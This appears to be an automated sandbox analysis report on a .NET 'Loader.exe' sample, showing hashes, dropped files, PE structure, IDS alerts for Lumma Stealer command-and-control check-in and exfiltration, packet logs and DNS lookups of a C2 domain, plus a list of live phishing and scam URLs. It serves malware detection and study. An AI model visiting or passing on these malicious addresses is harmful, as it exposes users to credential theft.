	http://lowes.mooo.com/index.php?search=4&d16852&morde=354-1256&lm=400100KWWT29761&sd=15&page=9u6rpKHD2TMFWFa#izRRKlsmoFgLg4jmhaU9	Get hash	malicious	Phisher	Browse	188.114.96.3
	https://chapelet-mariae.com.pl/qgxPm/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://tronlkam8s2.z13.web.core.windows.net	Get hash	malicious	TechSupportScam	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	SecuriteInfo.com.Heur.11787.148.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	StudioDemo.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\msvcp110.dll

Download File

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	618496
Entropy (8bit):	7.162338420980197
Encrypted:	false
SSDEEP:	12288:NaQC2TRw8o1IKPB2EbEPA99drekfl/EUGygoOV+uyJdaIKqL1hI51M:82TRI1XB2EbEo9/XflyXonuyKqL1hQ
MD5:	39BDA6BBB72A50BAA2DD3D3D6D55F17C
SHA1:	A3C63FB05A5A95520DA960540117EC128D3C86E4
SHA-256:	C95872DC3154D8688CE3EE0D4AA080C62012512A132C92E03DB54C09E16891ED
SHA-512:	DC56DADE50BDA2E3492781BEAFE83C8BFA861B7641CF8FFE2026FB55422578578AB22B754D5E6C3542763AAC220285A508FB530C62CEC6AAC9D29663402BD79C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.vkp}.8p}.8p}.8;..9\|}.8;..9.}.8;..9d}.8;..9v}.8W.c8s}.8p}.8.}.8v..9Q}.8v..9`}.8v..9d}.8p}.8q}.8...9q}.8...9q}.8Richp}.8........................PE..L......g...........!...&..................................................................@............................x......d................................ ..................................@...@...............t............................text.............................. ..`.rdata..ns.......t..................@..@.data....8...@...*...$..............@....reloc... ......."...N..............@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9056926013279805
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Loader.exe
File size:	392'704 bytes
MD5:	c92baaa9c4217759880a0ff0904695d9
SHA1:	3902c5a7a6e557ab736d2b0e65c55f3f8b5a7b7b
SHA256:	c72d1af1710785874f9c4bb686c4b7dfb89de050fb2c189898432247d8cfe386
SHA512:	2aa03461c0af47483095ed2c0f932e7af287e853f7998de6c92ee56c396da26abae066b467dbf6d150d21b7070fc85d1950bcced8e58c214385840f863729d37
SSDEEP:	6144:3boZRRYEmBhcU306dd4AvwdSaqRMNDADW8s6nVP5cQhuQWZjyZFfkz:LWRR00U3Tdd44eSQtg7nVP5nhi+Hfkz
TLSH:	CB84DF9CB66432DFC953D0B29EA82C74FA5078BA972F4203D427069EDA4D987DF540F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.....................h.......`....... ....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x46600a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6718B38B [Wed Oct 23 08:27:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00466000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x58834	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x6f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x66000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x58000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
nS5	0x2000	0x55d48	0x55e00	f0f0a5771c9a2d0c4beb38abc7ed88d4	False	1.0003297852983988	data	7.99947521126159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x58000	0x8ed8	0x9000	8388af038404591af5ff0f5401a38eb5	False	0.389404296875	data	4.732665844945101	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x6f8	0x800	374c8d5fc55ccf3a5ff0130edd132b53	False	0.396484375	data	3.7864731116706225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0xc	0x200	870a6a7b9c703b02b1e807ec0b5e7833	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x66000	0x10	0x200	0777db21f14a5d390fb883739ea01888	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x620a0	0x46c	data			0.450530035335689
RT_MANIFEST	0x6250c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T21:51:08.218465+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49699	188.114.96.3	443	TCP
2024-10-24T21:51:08.218465+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49699	188.114.96.3	443	TCP
2024-10-24T21:51:09.491651+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49700	188.114.96.3	443	TCP
2024-10-24T21:51:09.491651+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49700	188.114.96.3	443	TCP
2024-10-24T21:51:17.453106+0200	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49720	188.114.96.3	443	TCP
2024-10-24T21:51:20.582900+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49736	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:51:06.944626093 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:06.944681883 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:06.944760084 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:06.947922945 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:06.947938919 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:07.608620882 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:07.608705997 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:07.618401051 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:07.618408918 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:07.618783951 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:07.667485952 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:07.704693079 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:07.704746962 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:07.704967022 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:08.218502998 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:08.218729019 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:08.218874931 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:08.221112967 CEST	49699	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:08.221141100 CEST	443	49699	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:08.384480953 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:08.384529114 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:08.384625912 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:08.385185003 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:08.385220051 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.036091089 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.036173105 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.038120031 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.038130045 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.038455009 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.040143967 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.040179968 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.040227890 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491661072 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491709948 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491750956 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491781950 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491785049 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.491801977 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.491836071 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.492105007 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.492135048 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.492161036 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.492182970 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.492188931 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.492257118 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.492264032 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.492418051 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.493218899 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.542471886 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.608613968 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.608722925 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.608757973 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.608799934 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.608819008 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.608851910 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.608885050 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.608913898 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.609110117 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.609119892 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.609141111 CEST	49700	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.609146118 CEST	443	49700	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.743797064 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.743851900 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:09.744123936 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.744323015 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:09.744343042 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:10.639691114 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:10.639906883 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:10.641679049 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:10.641691923 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:10.641954899 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:10.643274069 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:10.643430948 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:10.643457890 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:11.257366896 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:11.257452965 CEST	443	49701	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:11.257683992 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:11.258265018 CEST	49701	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:11.466835976 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:11.466885090 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:11.467008114 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:11.467494965 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:11.467510939 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:12.463449955 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:12.463641882 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:12.464939117 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:12.464953899 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:12.465325117 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:12.466877937 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:12.467006922 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:12.467041016 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:12.467118025 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:12.467125893 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:13.137640953 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:13.137885094 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:13.137973070 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:13.138036966 CEST	49702	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:13.138050079 CEST	443	49702	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:13.638993025 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:13.639044046 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:13.639143944 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:13.639662981 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:13.639678955 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:14.682254076 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:14.682435036 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:14.696675062 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:14.696696043 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:14.697074890 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:14.698673010 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:14.698673010 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:14.698729038 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:14.698812008 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:14.698822975 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:15.553002119 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:15.553113937 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:15.553211927 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:15.568645000 CEST	49709	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:15.568665981 CEST	443	49709	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.331480980 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.331572056 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.331650972 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.332000971 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.332037926 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.953174114 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.953404903 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.954744101 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.954761028 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.955094099 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:16.956476927 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.956578016 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:16.956587076 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:17.453068018 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:17.453181028 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:17.453244925 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:17.453551054 CEST	49720	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:17.453593016 CEST	443	49720	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:17.668705940 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:17.668751001 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:17.668823957 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:17.669146061 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:17.669156075 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:18.688973904 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:18.689042091 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:18.774770021 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:18.774812937 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:18.775293112 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:18.781569958 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:18.781776905 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:18.781785011 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:19.394535065 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:19.394651890 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:19.394767046 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:19.394826889 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:19.394848108 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:19.447494984 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:19.447530985 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:19.447603941 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:19.447860956 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:19.447873116 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.102818966 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.102941990 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.104074955 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.104085922 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.104310036 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.105897903 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.105897903 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.105978966 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.582901001 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.583004951 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.583056927 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.583256006 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.583256006 CEST	49736	443	192.168.2.7	188.114.96.3
Oct 24, 2024 21:51:20.583267927 CEST	443	49736	188.114.96.3	192.168.2.7
Oct 24, 2024 21:51:20.583276033 CEST	443	49736	188.114.96.3	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:51:06.900010109 CEST	63449	53	192.168.2.7	1.1.1.1
Oct 24, 2024 21:51:06.938548088 CEST	53	63449	1.1.1.1	192.168.2.7
Oct 24, 2024 21:51:44.269059896 CEST	53	53613	162.159.36.2	192.168.2.7
Oct 24, 2024 21:51:44.888098955 CEST	59289	53	192.168.2.7	1.1.1.1
Oct 24, 2024 21:51:44.897464991 CEST	53	59289	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 21:51:06.900010109 CEST	192.168.2.7	1.1.1.1	0xcd16	Standard query (0)	withdrwblon.cyou	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:51:44.888098955 CEST	192.168.2.7	1.1.1.1	0x75d6	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 21:51:06.938548088 CEST	1.1.1.1	192.168.2.7	0xcd16	No error (0)	withdrwblon.cyou		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:51:06.938548088 CEST	1.1.1.1	192.168.2.7	0xcd16	No error (0)	withdrwblon.cyou		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:51:44.897464991 CEST	1.1.1.1	192.168.2.7	0x75d6	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

withdrwblon.cyou

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
